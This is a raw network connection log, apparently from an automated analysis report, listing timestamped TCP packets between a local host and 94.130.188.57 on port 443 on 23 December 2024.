                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.004916906 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.005027056 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.005146980 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.005337000 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.005361080 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.168356895 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.168546915 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.168806076 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.168821096 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170376062 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170389891 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170470953 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170497894 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170600891 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170641899 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170835972 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.170948029 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.171098948 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.171133995 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.171166897 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.171183109 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.171209097 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:00.171220064 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.404098034 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.404195070 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.404741049 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.404772043 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.407094955 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.407108068 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.407222033 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.407254934 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420027971 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420069933 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420212030 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420238018 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420367002 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420394897 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420422077 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420437098 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420486927 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420511961 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420578957 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420593977 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420610905 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420634031 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420670986 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420686007 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420694113 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420715094 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420737982 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420759916 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420797110 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420810938 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420844078 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420874119 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420898914 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420912981 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420957088 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.420991898 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421022892 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421045065 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421067953 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421081066 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421097994 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421109915 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421156883 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421174049 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421192884 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421211004 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421246052 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421261072 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421307087 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421322107 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421359062 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421376944 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421407938 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421427011 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421477079 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421494961 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421576023 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421595097 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421626091 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421638966 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421658039 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421669960 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421701908 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421716928 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421757936 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421772957 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421873093 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421889067 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421921015 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421936035 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421967030 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.421993017 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.422030926 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.422030926 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.422075033 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.422115088 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.422138929 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.422187090 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.422213078 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.422257900 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.422295094 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.422354937 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.467349052 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.467757940 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.467801094 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.467823982 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.467863083 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.467895985 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.467911005 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.467935085 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.467963934 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.468014002 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.468046904 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515327930 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515547037 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515733957 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515774012 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515805006 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515832901 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515861034 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515885115 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515908957 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515930891 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.515959024 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.563363075 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567039013 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567055941 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567089081 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567123890 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567229986 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567271948 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567301035 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567342043 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567399025 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.567425966 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611356974 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611555099 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611628056 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611675024 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611700058 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611747980 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611761093 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.611779928 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.659341097 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.660635948 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.660784006 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.660973072 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.661041021 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.661098957 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.703355074 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.781348944 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.781517029 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.781558990 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.781938076 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.781980038 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.823381901 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.871200085 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.871445894 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.871460915 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.871573925 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.872431040 CET49778443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.872477055 CET4434977894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.872987032 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.873075008 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.873172998 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.873471975 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.873507977 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899424076 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899590969 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899631977 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899724960 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899727106 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899775028 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899777889 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899821997 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899876118 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900059938 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900132895 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900690079 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900782108 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900959969 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900995970 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947335005 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947539091 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947596073 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947607994 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947607994 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947663069 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947665930 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947704077 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947717905 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947741985 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947746992 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947756052 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947774887 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947774887 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947825909 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947865963 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947932005 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947974920 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947997093 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.948043108 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.948065996 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.948098898 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.948121071 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.948178053 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.948267937 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.948292971 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.995354891 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.995443106 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.019741058 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.019920111 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.019965887 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.020124912 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.020191908 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.020191908 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.021424055 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.021441936 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.021575928 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.021661997 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.021825075 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.021878004 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.023272038 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.023416996 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.023483038 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.023513079 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.023753881 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.023807049 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.024831057 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.025006056 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.025083065 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.025238037 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.025283098 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.025451899 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.071353912 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.121663094 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.121805906 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.121854067 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.121985912 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.122024059 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.122184992 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.139421940 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.139524937 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.139714003 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.139775038 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.141546011 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.141630888 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.141659021 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.144653082 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.145692110 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.145776987 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.145817041 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.145838976 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.145915985 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.145948887 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.145967007 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.145998001 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.146034956 CET4434977994.130.188.57192.168.2.4
